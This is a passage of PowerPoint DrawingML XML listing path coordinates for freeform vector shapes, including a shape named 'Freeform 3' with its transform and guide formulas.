                    <a:pt x="1658" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="4247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="4473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="4751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="4888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="4762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="4568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="5339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="5486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913" y="5539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866" y="5591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834" y="5717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893" y="5607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3805" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="5791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249" y="5812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="5665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="5618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021" y="5565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721" y="5245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="5187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="4646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669" y="3759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="3350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="3218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="3187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="3071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396" y="3160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="3334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3974" y="3586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026" y="3659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4163" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4278" y="4468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252" y="4426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173" y="4342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1564" y="3969"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611" y="4032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="396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9" name="Freeform 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3625021" y="3218403"/>
              <a:ext cx="976981" cy="1167510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3134 w 6195"/>
                <a:gd name="T1" fmla="*/ 3213 h 7403"/>
                <a:gd name="T2" fmla="*/ 3097 w 6195"/>
                <a:gd name="T3" fmla="*/ 3228 h 7403"/>
                <a:gd name="T4" fmla="*/ 3087 w 6195"/>
                <a:gd name="T5" fmla="*/ 3559 h 7403"/>
                <a:gd name="T6" fmla="*/ 3097 w 6195"/>
                <a:gd name="T7" fmla="*/ 3596 h 7403"/>
                <a:gd name="T8" fmla="*/ 3134 w 6195"/>
                <a:gd name="T9" fmla="*/ 3611 h 7403"/>
                <a:gd name="T10" fmla="*/ 3454 w 6195"/>
                <a:gd name="T11" fmla="*/ 3606 h 7403"/>
                <a:gd name="T12" fmla="*/ 3480 w 6195"/>
                <a:gd name="T13" fmla="*/ 3580 h 7403"/>
                <a:gd name="T14" fmla="*/ 3485 w 6195"/>
                <a:gd name="T15" fmla="*/ 3265 h 7403"/>
                <a:gd name="T16" fmla="*/ 3470 w 6195"/>
                <a:gd name="T17" fmla="*/ 3228 h 7403"/>
                <a:gd name="T18" fmla="*/ 4000 w 6195"/>
                <a:gd name="T19" fmla="*/ 0 h 7403"/>
                <a:gd name="T20" fmla="*/ 10 w 6195"/>
                <a:gd name="T21" fmla="*/ 278 h 7403"/>
                <a:gd name="T22" fmla="*/ 125 w 6195"/>
                <a:gd name="T23" fmla="*/ 1086 h 7403"/>
                <a:gd name="T24" fmla="*/ 330 w 6195"/>
                <a:gd name="T25" fmla="*/ 1858 h 7403"/>
                <a:gd name="T26" fmla="*/ 635 w 6195"/>
                <a:gd name="T27" fmla="*/ 2593 h 7403"/>
                <a:gd name="T28" fmla="*/ 1018 w 6195"/>
                <a:gd name="T29" fmla="*/ 3275 h 7403"/>
                <a:gd name="T30" fmla="*/ 1480 w 6195"/>
                <a:gd name="T31" fmla="*/ 3900 h 7403"/>
                <a:gd name="T32" fmla="*/ 2015 w 6195"/>
                <a:gd name="T33" fmla="*/ 4467 h 7403"/>
                <a:gd name="T34" fmla="*/ 2614 w 6195"/>
                <a:gd name="T35" fmla="*/ 4966 h 7403"/>
                <a:gd name="T36" fmla="*/ 3271 w 6195"/>
                <a:gd name="T37" fmla="*/ 5391 h 7403"/>
                <a:gd name="T38" fmla="*/ 3979 w 6195"/>
                <a:gd name="T39" fmla="*/ 5732 h 7403"/>
                <a:gd name="T40" fmla="*/ 4735 w 6195"/>
                <a:gd name="T41" fmla="*/ 5985 h 7403"/>
                <a:gd name="T42" fmla="*/ 6194 w 6195"/>
                <a:gd name="T43" fmla="*/ 7402 h 7403"/>
                <a:gd name="T44" fmla="*/ 6084 w 6195"/>
                <a:gd name="T45" fmla="*/ 2178 h 7403"/>
                <a:gd name="T46" fmla="*/ 5769 w 6195"/>
                <a:gd name="T47" fmla="*/ 2121 h 7403"/>
                <a:gd name="T48" fmla="*/ 5470 w 6195"/>
                <a:gd name="T49" fmla="*/ 2015 h 7403"/>
                <a:gd name="T50" fmla="*/ 5186 w 6195"/>
                <a:gd name="T51" fmla="*/ 1874 h 7403"/>
                <a:gd name="T52" fmla="*/ 4929 w 6195"/>
                <a:gd name="T53" fmla="*/ 1701 h 7403"/>
                <a:gd name="T54" fmla="*/ 4698 w 6195"/>
                <a:gd name="T55" fmla="*/ 1496 h 7403"/>
                <a:gd name="T56" fmla="*/ 4493 w 6195"/>
                <a:gd name="T57" fmla="*/ 1265 h 7403"/>
                <a:gd name="T58" fmla="*/ 4320 w 6195"/>
                <a:gd name="T59" fmla="*/ 1008 h 7403"/>
                <a:gd name="T60" fmla="*/ 4179 w 6195"/>
                <a:gd name="T61" fmla="*/ 724 h 7403"/>
                <a:gd name="T62" fmla="*/ 4073 w 6195"/>
                <a:gd name="T63" fmla="*/ 425 h 7403"/>
                <a:gd name="T64" fmla="*/ 4016 w 6195"/>
                <a:gd name="T65" fmla="*/ 110 h 7403"/>
                <a:gd name="T66" fmla="*/ 4657 w 6195"/>
                <a:gd name="T67" fmla="*/ 3916 h 7403"/>
                <a:gd name="T68" fmla="*/ 4583 w 6195"/>
                <a:gd name="T69" fmla="*/ 3984 h 7403"/>
                <a:gd name="T70" fmla="*/ 4483 w 6195"/>
                <a:gd name="T71" fmla="*/ 4011 h 7403"/>
                <a:gd name="T72" fmla="*/ 2058 w 6195"/>
                <a:gd name="T73" fmla="*/ 4011 h 7403"/>
                <a:gd name="T74" fmla="*/ 1984 w 6195"/>
                <a:gd name="T75" fmla="*/ 3984 h 7403"/>
                <a:gd name="T76" fmla="*/ 1942 w 6195"/>
                <a:gd name="T77" fmla="*/ 3953 h 7403"/>
                <a:gd name="T78" fmla="*/ 1916 w 6195"/>
                <a:gd name="T79" fmla="*/ 3916 h 7403"/>
                <a:gd name="T80" fmla="*/ 1884 w 6195"/>
                <a:gd name="T81" fmla="*/ 3816 h 7403"/>
                <a:gd name="T82" fmla="*/ 1900 w 6195"/>
                <a:gd name="T83" fmla="*/ 3743 h 7403"/>
                <a:gd name="T84" fmla="*/ 3107 w 6195"/>
                <a:gd name="T85" fmla="*/ 1517 h 7403"/>
                <a:gd name="T86" fmla="*/ 3160 w 6195"/>
                <a:gd name="T87" fmla="*/ 1454 h 7403"/>
                <a:gd name="T88" fmla="*/ 3207 w 6195"/>
                <a:gd name="T89" fmla="*/ 1427 h 7403"/>
                <a:gd name="T90" fmla="*/ 3286 w 6195"/>
                <a:gd name="T91" fmla="*/ 1412 h 7403"/>
                <a:gd name="T92" fmla="*/ 3338 w 6195"/>
                <a:gd name="T93" fmla="*/ 1417 h 7403"/>
                <a:gd name="T94" fmla="*/ 3386 w 6195"/>
                <a:gd name="T95" fmla="*/ 1438 h 7403"/>
